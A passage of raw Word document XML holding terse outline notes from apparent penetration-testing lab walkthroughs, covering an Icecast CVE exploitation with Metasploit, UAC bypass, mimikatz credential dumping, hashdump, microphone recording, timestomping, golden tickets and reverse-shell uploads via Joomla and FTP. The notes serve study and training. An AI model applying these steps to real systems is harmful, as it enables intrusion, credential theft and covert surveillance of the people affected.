          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>as detected by http-enum and gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79922F5E" w14:textId="4C4989CF" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="00753B97">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Reverse Shell Upload via CMS Page Template Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CAB9E0" w14:textId="2F08A186" w:rsidR="002259C5" w:rsidRDefault="007A6E65" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId253" w:history="1">
        <w:r w:rsidR="002259C5" w:rsidRPr="00FF1D5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.hackingarticles.in/joomla-reverse-shell/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D941EA9" w14:textId="66673E6B" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D27C45" w14:textId="03B4781F" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PrivEsc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D70FDA0" w14:textId="297D8C9E" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Linpeas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50884F9B" w14:textId="56D333A4" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/dev/shm via http server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F710832" w14:textId="20816D33" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>configuration files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2046FD85" w14:textId="7156755C" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE135CC" w14:textId="567FD440" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FE7E4F" w14:textId="0A1C498B" w:rsidR="002259C5" w:rsidRDefault="002259C5" w:rsidP="002259C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3E00C1" w14:textId="4A269380" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>escalate to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F57C74" w14:textId="21A3F2D9" w:rsidR="00330747" w:rsidRDefault="00330747" w:rsidP="00330747">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7204A4D4" w14:textId="7D126AD1" w:rsidR="00C616BD" w:rsidRDefault="00C616BD" w:rsidP="00C616BD">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D54D69" w14:textId="265AE30B" w:rsidR="00C616BD" w:rsidRDefault="00072D68" w:rsidP="00C616BD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ICE Box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4D98B" w14:textId="0F7DC74F" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6753CF7A" w14:textId="69BF7EC6" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F5DE6" w14:textId="3FB6408A" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Icecast – Port 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6C413" w14:textId="764988F4" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>MSRDP – Port 3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17F6AB" w14:textId="192B327E" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Gain Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293CBD9A" w14:textId="320CAFD5" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC24364" w14:textId="729765E4" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Execute Code Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352CDD88" w14:textId="01970CEA" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CVE-2004-1561</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD70D14" w14:textId="29CA37CA" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCB0817" w14:textId="0DD3BF0E" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>search icecast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F553C27" w14:textId="76D4730F" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F3B02C" w14:textId="4F4EEE13" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221030D6" w14:textId="588B9C6E" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Escalate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD046B" w14:textId="0152D41C" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Determine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619FDEA2" w14:textId="16BC1A36" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49464303" w14:textId="28555AE9" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>System Build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D7116" w14:textId="449726F6" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BE7AF0" w14:textId="5439F85D" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF9F328" w14:textId="3108EB63" w:rsidR="00072D68" w:rsidRDefault="00072D68" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypassuac_eventvwr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B1360" w14:textId="621AF8B5" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use FULL_PATH_FOR_EXPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A93B9" w14:textId="3FC42586" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set SESSION #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E0637D" w14:textId="4CEF24B6" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60468B" w14:textId="3505A9CD" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sessions SESSION NUMBER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354FF870" w14:textId="2036CD78" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SeTakeOwnershipPrivilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71752A8A" w14:textId="5DD88760" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Looting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CE5DD1" w14:textId="174ED3D8" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ps command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4621C4B5" w14:textId="629A86EB" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>migrate to process with NT AUTHORITY\SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D36D53D" w14:textId="2C488C60" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>same architecture as lsass service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E17D0" w14:textId="311DDFEB" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>spoolsv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224163B" w14:textId="55D28596" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>getuid to confirm success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085BC15C" w14:textId="2B22EC7D" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>load kiwi (mimikatz)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D7348C" w14:textId="049E1A89" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>creds_all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA33C16" w14:textId="753514B7" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1068B03D" w14:textId="29B06AB1" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9D733" w14:textId="0B408954" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>screenshare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E11B6E" w14:textId="055D77FF" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>record_mic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD133B9" w14:textId="2657BCBA" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>timestomp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF004F7" w14:textId="375C2B05" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>only do with explicit permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EB368E" w14:textId="79447A9F" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>golden_ticket_create</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53210E49" w14:textId="449AD01F" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Extras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022F1194" w14:textId="6A5C0080" w:rsidR="000710D0" w:rsidRDefault="007A6E65" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId254" w:history="1">
        <w:r w:rsidR="000710D0" w:rsidRPr="005C5F06">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/exploits/568</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="01639523" w14:textId="34248740" w:rsidR="000710D0" w:rsidRDefault="000710D0" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>manual exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7865714C" w14:textId="001A4EDD" w:rsidR="004076BE" w:rsidRDefault="004076BE" w:rsidP="004076BE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43D3B7FF" w14:textId="743FFFEF" w:rsidR="004076BE" w:rsidRDefault="001D1E86" w:rsidP="004076BE">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A7B6F" w14:textId="114BC5FE" w:rsidR="001D1E86" w:rsidRDefault="001D1E86" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Enumeration and Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F749D0" w14:textId="6EC60227" w:rsidR="001D1E86" w:rsidRDefault="001D1E86" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4D8C3A" w14:textId="4897DEC8" w:rsidR="001D1E86" w:rsidRDefault="001D1E86" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>rustscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054A8AEE" w14:textId="27615E84" w:rsidR="001D1E86" w:rsidRDefault="001D1E86" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D73A4CD" w14:textId="76EAB68F" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>FTP and HTTP Directory Matching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A92D2" w14:textId="7E90619A" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if the same, files (reverse shells) can be uploaded to FTP directory and executed in browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FD4769" w14:textId="464248A0" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Abusing the FTP/HTTP Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E8FCEF" w14:textId="78F383DC" w:rsidR="002549D1" w:rsidRDefault="002549D1" w:rsidP="004A5611">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
